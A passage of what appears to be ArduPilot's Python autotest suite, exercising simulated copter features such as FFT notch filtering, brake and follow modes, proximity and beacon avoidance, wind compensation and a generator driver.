self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 250,
"SIM_VIB_FREQ_Y": 250,
"SIM_VIB_FREQ_Z": 250,
})
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 128, 250)
# Step 1b: run the same test with an FFT length of 256 which is needed to flush out a
# whole host of bugs related to uint8_t. This also tests very accurately the frequency resolution
self.set_parameter("FFT_WINDOW_SIZE", 256)
self.start_subtest("Inject noise at 250Hz and check the FFT can find the noise")
self.reboot_sitl()
# find a motor peak
self.hover_and_check_matched_frequency(-15, 100, 350, 256, 250)
self.set_parameter("FFT_WINDOW_SIZE", 128)
# Step 2: inject actual motor noise and use the standard length FFT to track it
self.start_subtest("Hover and check that the FFT can find the motor noise")
self.set_parameters({
"SIM_VIB_FREQ_X": 0,
"SIM_VIB_FREQ_Y": 0,
"SIM_VIB_FREQ_Z": 0,
"SIM_VIB_MOT_MAX": 250, # gives a motor peak at about 175Hz
"FFT_WINDOW_SIZE": 32,
"FFT_WINDOW_OLAP": 0.5,
})
self.reboot_sitl()
freq = self.hover_and_check_matched_frequency(-15, 100, 250, 32)
self.set_parameter("SIM_VIB_MOT_MULT", 1.)
# Step 3: add a FFT dynamic notch and check that the peak is squashed
self.start_subtest("Add a dynamic notch, hover and check that the noise peak is now gone")
self.set_parameters({
"INS_LOG_BAT_OPT": 2,
"INS_HNTCH_ENABLE": 1,
"INS_HNTCH_FREQ": freq,
"INS_HNTCH_REF": 1.0,
"INS_HNTCH_ATT": 50,
"INS_HNTCH_BW": freq/2,
"INS_HNTCH_MODE": 4,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
hover_time = 15
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
# fly fast forrest!
self.set_rc(3, 1900)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.set_rc(3, 1500)
self.set_rc(2, 1500)
self.do_RTL()
psd = self.mavfft_fttd(1, 0, tstart * 1.0e6, tend * 1.0e6)
# batch sampler defaults give 1024 fft and sample rate of 1kz so roughly 1hz/bin
scale = 1000. / 1024.
sminhz = int(100 * scale)
smaxhz = int(350 * scale)
freq = psd["F"][numpy.argmax(psd["X"][sminhz:smaxhz]) + sminhz]
peakdb = numpy.amax(psd["X"][sminhz:smaxhz])
if peakdb < 0:
self.progress("Did not detect a motor peak, found %fHz at %fdB" % (freq, peakdb))
else:
raise NotAchievedException("Detected %fHz motor peak at %fdB" % (freq, peakdb))
# Step 4: loop sample rate test with larger window
self.start_subtest("Hover and check that the FFT can find the motor noise when running at fast loop rate")
# we are limited to half the loop rate for frequency detection
self.set_parameters({
"FFT_MAXHZ": 185,
"INS_LOG_BAT_OPT": 0,
"SIM_VIB_MOT_MAX": 220,
"FFT_WINDOW_SIZE": 64,
"FFT_WINDOW_OLAP": 0.75,
"FFT_SAMPLE_MODE": 1,
})
self.reboot_sitl()
self.takeoff(10, mode="ALT_HOLD")
self.progress("Hovering for %u seconds" % hover_time)
tstart = self.get_sim_time()
while self.get_sim_time_cached() < tstart + hover_time:
self.mav.recv_match(type='ATTITUDE', blocking=True)
tend = self.get_sim_time()
self.do_RTL()
# prevent update parameters from messing with the settings when we pop the context
self.set_parameter("FFT_ENABLE", 0)
self.reboot_sitl()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
# must reboot after we move away from EKF type 10 to EKF2 or EKF3
self.reboot_sitl()
if ex is not None:
raise ex
def fly_brake_mode(self):
# test brake mode
self.progress("Testing brake mode")
self.takeoff(10, mode="LOITER")
self.progress("Ensuring RC inputs have no effect in brake mode")
self.change_mode("STABILIZE")
self.set_rc(3, 1500)
self.set_rc(2, 1200)
self.wait_groundspeed(5, 1000)
self.change_mode("BRAKE")
self.wait_groundspeed(0, 1)
self.set_rc(2, 1500)
self.do_RTL()
self.progress("Ran brake mode")
def fly_guided_move_to(self, destination, timeout=30):
'''move to mavutil.location location; absolute altitude'''
tstart = self.get_sim_time()
self.mav.mav.set_position_target_global_int_send(
0, # timestamp
1, # target system_id
1, # target component id
mavutil.mavlink.MAV_FRAME_GLOBAL_INT,
0b1111111111111000, # mask specifying use-only-lat-lon-alt
int(destination.lat * 1e7), # lat
int(destination.lng * 1e7), # lon
destination.alt, # alt
0, # vx
0, # vy
0, # vz
0, # afx
0, # afy
0, # afz
0, # yaw
0, # yawrate
)
while True:
if self.get_sim_time() - tstart > timeout:
raise NotAchievedException()
delta = self.get_distance(self.mav.location(), destination)
self.progress("delta=%f (want <1)" % delta)
if delta < 1:
break
def test_altitude_types(self):
'''start by disabling GCS failsafe, otherwise we immediately disarm
due to (apparently) not receiving traffic from the GCS for
too long. This is probably a function of --speedup'''
'''this test flies the vehicle somewhere lower than were it started.
It then disarms. It then arms, which should reset home to the
new, lower altitude. This delta should be outside 1m but
within a few metres of the old one.
'''
# we must start mavproxy here as otherwise we can't get the
# terrain database tiles - this leads to random failures in
# CI!
mavproxy = self.start_mavproxy()
self.set_parameter("FS_GCS_ENABLE", 0)
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_home_alt_m = 500
if m.relative_alt > max_initial_home_alt_m:
raise NotAchievedException("Initial home alt too high (%fm > %fm)" %
(m.relative_alt*1000, max_initial_home_alt_m*1000))
orig_home_offset_mm = m.alt - m.relative_alt
self.user_takeoff(5)
self.progress("Flying to low position")
current_alt = self.mav.location().alt
# 10m delta low_position = mavutil.location(-35.358273, 149.169165, current_alt, 0)
low_position = mavutil.location(-35.36200016, 149.16415599, current_alt, 0)
self.fly_guided_move_to(low_position, timeout=240)
self.change_mode('LAND')
# expecting home to change when disarmed
self.wait_landed_and_disarmed()
# wait a while for home to move (it shouldn't):
self.delay_sim_time(10)
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
new_home_offset_mm = m.alt - m.relative_alt
home_offset_delta_mm = orig_home_offset_mm - new_home_offset_mm
self.progress("new home offset: %f delta=%f" %
(new_home_offset_mm, home_offset_delta_mm))
self.progress("gpi=%s" % str(m))
max_home_offset_delta_mm = 10
if home_offset_delta_mm > max_home_offset_delta_mm:
raise NotAchievedException("Large home offset delta: want<%f got=%f" %
(max_home_offset_delta_mm, home_offset_delta_mm))
self.progress("Ensuring home moves when we arm")
self.change_mode('GUIDED')
self.wait_ready_to_arm()
self.arm_vehicle()
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
post_arming_home_offset_mm = m.alt - m.relative_alt
self.progress("post-arming home offset: %f" % (post_arming_home_offset_mm))
self.progress("gpi=%s" % str(m))
min_post_arming_home_offset_delta_mm = -3000
max_post_arming_home_offset_delta_mm = -4000
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm = post_arming_home_offset_mm - orig_home_offset_mm
self.progress("delta=%f-%f=%f" % (
post_arming_home_offset_mm,
orig_home_offset_mm,
delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.progress("Home moved %fm vertically" % (delta_between_original_home_alt_offset_and_new_home_alt_offset_mm/1000.0))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm > min_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home did not move vertically on arming: want<=%f got=%f" %
(min_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
if delta_between_original_home_alt_offset_and_new_home_alt_offset_mm < max_post_arming_home_offset_delta_mm:
raise NotAchievedException(
"Home moved too far vertically on arming: want>=%f got=%f" %
(max_post_arming_home_offset_delta_mm, delta_between_original_home_alt_offset_and_new_home_alt_offset_mm))
self.wait_disarmed()
self.stop_mavproxy(mavproxy)
def fly_precision_companion(self):
"""Use Companion PrecLand backend precision messages to loiter."""
self.context_push()
ex = None
try:
self.set_parameter("PLND_ENABLED", 1)
# enable companion backend:
self.set_parameter("PLND_TYPE", 1)
self.set_analog_rangefinder_parameters()
# set up a channel switch to enable precision loiter:
self.set_parameter("RC7_OPTION", 39)
self.reboot_sitl()
self.progress("Waiting for location")
self.mav.location()
self.zero_throttle()
self.change_mode('STABILIZE')
self.wait_ready_to_arm()
# we should be doing precision loiter at this point
start = self.mav.recv_match(type='LOCAL_POSITION_NED',
blocking=True)
self.arm_vehicle()
self.set_rc(3, 1800)
alt_min = 10
self.wait_altitude(alt_min,
(alt_min + 5),
relative=True)
self.set_rc(3, 1500)
# move away a little
self.set_rc(2, 1550)
self.wait_distance(5, accuracy=1)
self.set_rc(2, 1500)
self.change_mode('LOITER')
# turn precision loiter on:
self.set_rc(7, 2000)
# try to drag aircraft to a position 5 metres north-east-east:
self.loiter_to_ne(start.x + 5, start.y + 10, start.z + 10)
self.loiter_to_ne(start.x + 5, start.y - 10, start.z + 10)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.zero_throttle()
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.progress("All done")
if ex is not None:
raise ex
def loiter_requires_position(self):
# ensure we can't switch to LOITER without position
self.progress("Ensure we can't enter LOITER without position")
self.context_push()
self.set_parameter("GPS_TYPE", 2)
self.set_parameter("SIM_GPS_DISABLE", 1)
self.reboot_sitl()
# check for expected EKF flags
ahrs_ekf_type = self.get_parameter("AHRS_EKF_TYPE")
expected_ekf_flags = (mavutil.mavlink.ESTIMATOR_ATTITUDE |
mavutil.mavlink.ESTIMATOR_VELOCITY_VERT |
mavutil.mavlink.ESTIMATOR_POS_VERT_ABS |
mavutil.mavlink.ESTIMATOR_CONST_POS_MODE)
if ahrs_ekf_type == 2:
expected_ekf_flags = expected_ekf_flags | mavutil.mavlink.ESTIMATOR_PRED_POS_HORIZ_REL
self.wait_ekf_flags(expected_ekf_flags, 0, timeout=120)
# arm in Stabilize and attempt to switch to Loiter
self.change_mode('STABILIZE')
self.arm_vehicle()
self.context_collect('STATUSTEXT')
self.run_cmd_do_set_mode(
"LOITER",
want_result=mavutil.mavlink.MAV_RESULT_FAILED)
self.wait_statustext("requires position", check_context=True)
self.disarm_vehicle()
self.context_pop()
self.reboot_sitl()
def test_arm_feature(self):
self.loiter_requires_position()
super(AutoTestCopter, self).test_arm_feature()
def test_parameter_checks(self):
self.test_parameter_checks_poscontrol("PSC")
def fly_poshold_takeoff(self):
"""ensure vehicle stays put until it is ready to fly"""
self.context_push()
ex = None
try:
self.set_parameter("PILOT_TKOFF_ALT", 700)
self.change_mode('POSHOLD')
self.set_rc(3, 1000)
self.wait_ready_to_arm()
self.arm_vehicle()
self.delay_sim_time(2)
# check we are still on the ground...
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
if abs(m.relative_alt) > 100:
raise NotAchievedException("Took off prematurely")
self.progress("Pushing throttle up")
self.set_rc(3, 1710)
self.delay_sim_time(0.5)
self.progress("Bringing back to hover throttle")
self.set_rc(3, 1500)
# make sure we haven't already reached alt:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
max_initial_alt = 500
if abs(m.relative_alt) > max_initial_alt:
raise NotAchievedException("Took off too fast (%f > %f" %
(abs(m.relative_alt), max_initial_alt))
self.progress("Monitoring takeoff-to-alt")
self.wait_altitude(6.9, 8, relative=True)
self.progress("Making sure we stop at our takeoff altitude")
tstart = self.get_sim_time()
while self.get_sim_time() - tstart < 5:
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
delta = abs(7000 - m.relative_alt)
self.progress("alt=%f delta=%f" % (m.relative_alt/1000,
delta/1000))
if delta > 1000:
raise NotAchievedException("Failed to maintain takeoff alt")
self.progress("takeoff OK")
except Exception as e:
self.print_exception_caught(e)
ex = e
self.land_and_disarm()
self.set_rc(8, 1000)
self.context_pop()
if ex is not None:
raise ex
def initial_mode(self):
return "STABILIZE"
def initial_mode_switch_mode(self):
return "STABILIZE"
def default_mode(self):
return "STABILIZE"
def rc_defaults(self):
ret = super(AutoTestCopter, self).rc_defaults()
ret[3] = 1000
ret[5] = 1800 # mode switch
return ret
def test_manual_control(self):
'''test manual_control mavlink message'''
self.set_parameter("SYSID_MYGCS", self.mav.source_system)
self.change_mode('STABILIZE')
self.takeoff(10)
tstart = self.get_sim_time_cached()
want_pitch_degrees = -12
while True:
if self.get_sim_time_cached() - tstart > 10:
raise AutoTestTimeoutException("Did not reach pitch")
self.progress("Sending pitch-forward")
self.mav.mav.manual_control_send(
1, # target system
500, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
m = self.mav.recv_match(type='ATTITUDE', blocking=True, timeout=1)
print("m=%s" % str(m))
if m is None:
continue
p = math.degrees(m.pitch)
self.progress("pitch=%f want<=%f" % (p, want_pitch_degrees))
if p <= want_pitch_degrees:
break
self.mav.mav.manual_control_send(
1, # target system
32767, # x (pitch)
32767, # y (roll)
32767, # z (thrust)
32767, # r (yaw)
0) # button mask
self.do_RTL()
def check_avoidance_corners(self):
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.363007,
149.164911,
0,
0)
self.wait_location(west_loc, accuracy=6)
north_loc = mavutil.location(-35.362908,
149.165051,
0,
0)
self.reach_heading_manual(0)
self.wait_location(north_loc, accuracy=6, timeout=200)
self.reach_heading_manual(90)
east_loc = mavutil.location(-35.363013,
149.165194,
0,
0)
self.wait_location(east_loc, accuracy=6)
self.reach_heading_manual(225)
self.wait_location(west_loc, accuracy=6, timeout=200)
self.set_rc(2, 1500)
self.do_RTL()
def OBSTACLE_DISTANCE_3D_test_angle(self, angle):
now = self.get_sim_time_cached()
distance = 15
right = distance * math.sin(math.radians(angle))
front = distance * math.cos(math.radians(angle))
down = 0
expected_distance_cm = distance * 100
# expected orientation
expected_orientation = int((angle+22.5)/45) % 8
self.progress("Angle %f expected orient %u" %
(angle, expected_orientation))
tstart = self.get_sim_time()
last_send = 0
while True:
now = self.get_sim_time_cached()
if now - tstart > 10:
raise NotAchievedException("Did not get correct angle back")
if now - last_send > 0.1:
self.progress("ang=%f sending front=%f right=%f" %
(angle, front, right))
self.mav.mav.obstacle_distance_3d_send(
int(now*1000), # time_boot_ms
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER,
mavutil.mavlink.MAV_FRAME_BODY_FRD,
65535,
front, # x (m)
right, # y (m)
down, # z (m)
0, # min_distance (m)
20 # max_distance (m)
)
last_send = now
m = self.mav.recv_match(type="DISTANCE_SENSOR",
blocking=True,
timeout=1)
if m is None:
continue
# self.progress("Got (%s)" % str(m))
if m.orientation != expected_orientation:
# self.progress("Wrong orientation (want=%u got=%u)" %
# (expected_orientation, m.orientation))
continue
if abs(m.current_distance - expected_distance_cm) > 1:
# self.progress("Wrong distance (want=%f got=%f)" %
# (expected_distance_cm, m.current_distance))
continue
self.progress("distance-at-angle good")
break
def OBSTACLE_DISTANCE_3D(self):
self.context_push()
ex = None
try:
self.set_parameters({
"SERIAL5_PROTOCOL": 1,
"PRX_TYPE": 2,
})
self.reboot_sitl()
for angle in range(0, 360):
self.OBSTACLE_DISTANCE_3D_test_angle(angle)
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_corners(self):
self.start_subtest("Corners")
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.set_parameter("PRX_TYPE", 10)
self.set_parameter("RC10_OPTION", 40) # proximity-enable
self.reboot_sitl()
self.progress("Enabling proximity")
self.set_rc(10, 2000)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test_alt_no_avoid(self):
self.start_subtest("Alt-no-avoid")
self.context_push()
ex = None
try:
self.set_parameter("PRX_TYPE", 2)
self.set_parameter("AVOID_ALT_MIN", 10)
self.set_analog_rangefinder_parameters()
self.reboot_sitl()
tstart = self.get_sim_time()
self.change_mode('LOITER')
while True:
if self.armed():
break
if self.get_sim_time_cached() - tstart > 60:
raise AutoTestTimeoutException("Did not arm")
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
400, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
26, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.send_cmd(mavutil.mavlink.MAV_CMD_COMPONENT_ARM_DISARM,
1, # ARM
0,
0,
0,
0,
0,
0)
self.wait_heartbeat()
self.takeoff(15, mode='LOITER')
self.progress("Poking vehicle; should avoid")
def shove(a, b):
self.mav.mav.distance_sensor_send(
0, # time_boot_ms
10, # min_distance cm
500, # max_distance cm
20, # current_distance cm
mavutil.mavlink.MAV_DISTANCE_SENSOR_LASER, # type
21, # id
mavutil.mavlink.MAV_SENSOR_ROTATION_NONE, # orientation
255 # covariance
)
self.wait_speed_vector_bf(
Vector3(-0.4, 0.0, 0.0),
timeout=10,
called_function=shove,
)
self.change_alt(5)
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > 10:
break
vel = self.get_body_frame_velocity()
if vel.length() > 0.3:
raise NotAchievedException("Moved too much (%s)" %
(str(vel),))
shove(None, None)
except Exception as e:
self.progress("Caught exception: %s" %
self.get_exception_stacktrace(e))
ex = e
self.context_pop()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_proximity_avoidance_test(self):
self.fly_proximity_avoidance_test_alt_no_avoid()
self.fly_proximity_avoidance_test_corners()
def fly_fence_avoidance_test(self):
self.context_push()
ex = None
try:
self.load_fence("copter-avoidance-fence.txt")
self.set_parameter("FENCE_ENABLE", 1)
self.check_avoidance_corners()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
if ex is not None:
raise ex
def global_position_int_for_location(self, loc, time_boot, heading=0):
return self.mav.mav.global_position_int_encode(
int(time_boot * 1000), # time_boot_ms
int(loc.lat * 1e7),
int(loc.lng * 1e7),
int(loc.alt * 1000), # alt in mm
20, # relative alt - urp.
vx=0,
vy=0,
vz=0,
hdg=heading
)
def fly_follow_mode(self):
self.set_parameter("FOLL_ENABLE", 1)
self.set_parameter("FOLL_SYSID", self.mav.source_system)
foll_ofs_x = 30 # metres
self.set_parameter("FOLL_OFS_X", -foll_ofs_x)
self.set_parameter("FOLL_OFS_TYPE", 1) # relative to other vehicle heading
self.takeoff(10, mode="LOITER")
self.set_parameter("SIM_SPEEDUP", 1)
self.change_mode("FOLLOW")
new_loc = self.mav.location()
new_loc_offset_n = 20
new_loc_offset_e = 30
self.location_offset_ne(new_loc, new_loc_offset_n, new_loc_offset_e)
self.progress("new_loc: %s" % str(new_loc))
heading = 0
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f greenplane %f\n" %
(new_loc.lat, new_loc.lng, heading))
expected_loc = copy.copy(new_loc)
self.location_offset_ne(expected_loc, -foll_ofs_x, 0)
if self.mavproxy is not None:
self.mavproxy.send("map icon %f %f hoop\n" %
(expected_loc.lat, expected_loc.lng))
self.progress("expected_loc: %s" % str(expected_loc))
last_sent = 0
tstart = self.get_sim_time()
while True:
now = self.get_sim_time_cached()
if now - tstart > 60:
raise NotAchievedException("Did not FOLLOW")
if now - last_sent > 0.5:
gpi = self.global_position_int_for_location(new_loc,
now,
heading=heading)
gpi.pack(self.mav.mav)
self.mav.mav.send(gpi)
self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True)
pos = self.mav.location()
delta = self.get_distance(expected_loc, pos)
max_delta = 3
self.progress("position delta=%f (want <%f)" % (delta, max_delta))
if delta < max_delta:
break
self.do_RTL()
def get_global_position_int(self, timeout=30):
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get good global_position_int")
m = self.mav.recv_match(type='GLOBAL_POSITION_INT', blocking=True, timeout=1)
self.progress("GPI: %s" % str(m))
if m is None:
continue
if m.lat != 0 or m.lon != 0:
return m
def fly_beacon_position(self):
self.reboot_sitl()
self.wait_ready_to_arm(require_absolute=True)
old_pos = self.get_global_position_int()
print("old_pos=%s" % str(old_pos))
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", SITL_START_LOCATION.lat)
self.set_parameter("BCN_LONGITUDE", SITL_START_LOCATION.lng)
self.set_parameter("BCN_ALT", SITL_START_LOCATION.alt)
self.set_parameter("BCN_ORIENT_YAW", 0)
self.set_parameter("AVOID_ENABLE", 4)
self.set_parameter("GPS_TYPE", 0)
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK3_SRC1_POSXY", 4) # Beacon
self.set_parameter("EK3_SRC1_POSZ", 1) # Baro
self.set_parameter("EK3_SRC1_VELXY", 0) # None
self.set_parameter("EK3_SRC1_VELZ", 0) # None
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.reboot_sitl()
# turn off GPS arming checks. This may be considered a
# bug that we need to do this.
old_arming_check = int(self.get_parameter("ARMING_CHECK"))
if old_arming_check == 1:
old_arming_check = 1 ^ 25 - 1
new_arming_check = int(old_arming_check) & ~(1 << 3)
self.set_parameter("ARMING_CHECK", new_arming_check)
self.reboot_sitl()
# require_absolute=True infers a GPS is present
self.wait_ready_to_arm(require_absolute=False)
tstart = self.get_sim_time()
timeout = 20
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not get new position like old position")
self.progress("Fetching location")
new_pos = self.get_global_position_int()
pos_delta = self.get_distance_int(old_pos, new_pos)
max_delta = 1
self.progress("delta=%u want <= %u" % (pos_delta, max_delta))
if pos_delta <= max_delta:
break
self.progress("Moving to ensure location is tracked")
self.takeoff(10, mode="STABILIZE")
self.change_mode("CIRCLE")
tstart = self.get_sim_time()
max_delta = 0
max_allowed_delta = 10
while True:
if self.get_sim_time_cached() - tstart > timeout:
break
pos_delta = self.get_distance_int(self.sim_location_int(), self.get_global_position_int())
self.progress("pos_delta=%f max_delta=%f max_allowed_delta=%f" % (pos_delta, max_delta, max_allowed_delta))
if pos_delta > max_delta:
max_delta = pos_delta
if pos_delta > max_allowed_delta:
raise NotAchievedException("Vehicle location not tracking simulated location (%f > %f)" %
(pos_delta, max_allowed_delta))
self.progress("Tracked location just fine (max_delta=%f)" % max_delta)
self.change_mode("LOITER")
self.wait_groundspeed(0, 0.3, timeout=120)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def fly_beacon_avoidance_test(self):
self.context_push()
ex = None
try:
self.set_parameter("BCN_TYPE", 10)
self.set_parameter("BCN_LATITUDE", int(SITL_START_LOCATION.lat))
self.set_parameter("BCN_LONGITUDE", int(SITL_START_LOCATION.lng))
self.set_parameter("BCN_ORIENT_YAW", 45)
self.set_parameter("AVOID_ENABLE", 4)
self.reboot_sitl()
self.takeoff(10, mode="LOITER")
self.set_rc(2, 1400)
west_loc = mavutil.location(-35.362919, 149.165055, 0, 0)
self.wait_location(west_loc, accuracy=7)
self.reach_heading_manual(0)
north_loc = mavutil.location(-35.362881, 149.165103, 0, 0)
self.wait_location(north_loc, accuracy=7)
self.set_rc(2, 1500)
self.set_rc(1, 1600)
east_loc = mavutil.location(-35.362986, 149.165227, 0, 0)
self.wait_location(east_loc, accuracy=7)
self.set_rc(1, 1500)
self.set_rc(2, 1600)
south_loc = mavutil.location(-35.363025, 149.165182, 0, 0)
self.wait_location(south_loc, accuracy=7)
self.set_rc(2, 1500)
self.do_RTL()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.context_pop()
self.clear_fence()
self.disarm_vehicle(force=True)
self.reboot_sitl()
if ex is not None:
raise ex
def fly_wind_baro_compensation(self):
self.context_push()
ex = None
try:
self.customise_SITL_commandline(
["--defaults", ','.join(self.model_defaults_filepath('ArduCopter', 'Callisto'))],
model="octa-quad:@ROMFS/models/Callisto.json",
wipe=True,
)
wind_spd_truth = 8.0
wind_dir_truth = 90.0
self.set_parameter("EK3_ENABLE", 1)
self.set_parameter("EK2_ENABLE", 0)
self.set_parameter("AHRS_EKF_TYPE", 3)
self.set_parameter("BARO1_WCF_ENABLE", 1.000000)
self.reboot_sitl()
self.set_parameter("EK3_DRAG_BCOEF_X", 361.000000)
self.set_parameter("EK3_DRAG_BCOEF_Y", 361.000000)
self.set_parameter("EK3_DRAG_MCOEF", 0.082000)
self.set_parameter("BARO1_WCF_FWD", -0.300000)
self.set_parameter("BARO1_WCF_BCK", -0.300000)
self.set_parameter("BARO1_WCF_RGT", 0.300000)
self.set_parameter("BARO1_WCF_LFT", 0.300000)
self.set_parameter("SIM_BARO_WCF_FWD", -0.300000)
self.set_parameter("SIM_BARO_WCF_BAK", -0.300000)
self.set_parameter("SIM_BARO_WCF_RGT", 0.300000)
self.set_parameter("SIM_BARO_WCF_LFT", 0.300000)
self.set_parameter("SIM_WIND_DIR", wind_dir_truth)
self.set_parameter("SIM_WIND_SPD", wind_spd_truth)
self.set_parameter("SIM_WIND_T", 1.000000)
self.reboot_sitl()
# require_absolute=True infers a GPS is present
self.wait_ready_to_arm(require_absolute=False)
self.progress("Climb to 20m in LOITER and yaw spin for 30 seconds")
self.takeoff(10, mode="LOITER")
self.set_rc(4, 1400)
self.delay_sim_time(30)
# check wind esitmates
m = self.mav.recv_match(type='WIND', blocking=True)
speed_error = abs(m.speed - wind_spd_truth)
angle_error = abs(m.direction - wind_dir_truth)
if (speed_error > 1.0):
raise NotAchievedException("Wind speed incorrect - want %f +-1 got %f m/s" % (wind_spd_truth, m.speed))
if (angle_error > 15.0):
raise NotAchievedException(
"Wind direction incorrect - want %f +-15 got %f deg" %
(wind_dir_truth, m.direction))
self.progress("Wind estimate is good, now check height variation for 30 seconds")
# check height stability over another 30 seconds
z_min = 1E6
z_max = -1E6
tstart = self.get_sim_time()
while (self.get_sim_time() < tstart + 30):
m = self.mav.recv_match(type='LOCAL_POSITION_NED', blocking=True)
if (m.z > z_max):
z_max = m.z
if (m.z < z_min):
z_min = m.z
if (z_max-z_min > 0.5):
raise NotAchievedException("Height variation is excessive")
self.progress("Height variation is good")
self.set_rc(4, 1500)
self.land_and_disarm()
except Exception as e:
self.print_exception_caught(e)
ex = e
self.disarm_vehicle(force=True)
self.reboot_sitl()
self.context_pop()
self.reboot_sitl()
if ex is not None:
raise ex
def wait_generator_speed_and_state(self, rpm_min, rpm_max, want_state, timeout=240):
self.drain_mav()
tstart = self.get_sim_time()
while True:
if self.get_sim_time_cached() - tstart > timeout:
raise NotAchievedException("Did not move to state/speed")
m = self.mav.recv_match(type="GENERATOR_STATUS", blocking=True, timeout=10)
if m is None:
raise NotAchievedException("Did not get GENERATOR_STATUS")
if m.generator_speed < rpm_min:
self.progress("Too slow (%u<%u)" % (m.generator_speed, rpm_min))
continue
if m.generator_speed > rpm_max:
self.progress("Too fast (%u>%u)" % (m.generator_speed, rpm_max))
continue
if m.status != want_state:
self.progress("Wrong state (got=%u want=%u)" % (m.status, want_state))
break
self.progress("Got generator speed and state")
def test_richenpower(self):
self.set_parameter("SERIAL5_PROTOCOL", 30)
self.set_parameter("SIM_RICH_ENABLE", 1)
self.set_parameter("SERVO8_FUNCTION", 42)
self.set_parameter("SIM_RICH_CTRL", 8)
self.set_parameter("RC9_OPTION", 85)
self.set_parameter("LOG_DISARMED", 1)
self.set_parameter("BATT2_MONITOR", 17)
self.set_parameter("GEN_TYPE", 3)
self.reboot_sitl()
self.set_rc(9, 1000) # remember this is a switch position - stop
self.customise_SITL_commandline(["--uartF=sim:richenpower"])
self.wait_statustext("requested state is not RUN", timeout=60)
self.set_message_rate_hz("GENERATOR_STATUS", 10)
self.drain_mav_unparsed()
self.wait_generator_speed_and_state(0, 0, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_OFF)
messages = []
def my_message_hook(mav, m):
if m.get_type() != 'STATUSTEXT':
return
messages.append(m)
self.install_message_hook(my_message_hook)
try:
self.set_rc(9, 2000) # remember this is a switch position - run
finally:
self.remove_message_hook(my_message_hook)
if "Generator HIGH" not in [x.text for x in messages]:
self.wait_statustext("Generator HIGH", timeout=60)
self.set_rc(9, 1000) # remember this is a switch position - stop
self.wait_statustext("requested state is not RUN", timeout=200)
self.set_rc(9, 1500) # remember this is a switch position - idle
self.wait_generator_speed_and_state(3000, 8000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_IDLE)
self.set_rc(9, 2000) # remember this is a switch position - run
# self.wait_generator_speed_and_state(3000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_WARMING_UP)
self.wait_generator_speed_and_state(8000, 30000, mavutil.mavlink.MAV_GENERATOR_STATUS_FLAG_GENERATING)
bs = self.mav.recv_match(
type="BATTERY_STATUS",
condition="BATTERY_STATUS.id==1", # id is zero-indexed
timeout=1,
blocking=True
)
if bs is None:
raise NotAchievedException("Did not receive BATTERY_STATUS")
self.progress("Received battery status: %s" % str(bs))
want_bs_volt = 50000
if bs.voltages[0] != want_bs_volt:
raise NotAchievedException("Battery voltage not as expected (want=%f) got=(%f)" % (want_bs_volt, bs.voltages[0],))
self.progress("Moving *back* to idle")
self.set_rc(9, 1500) # remember this is a switch position - idle
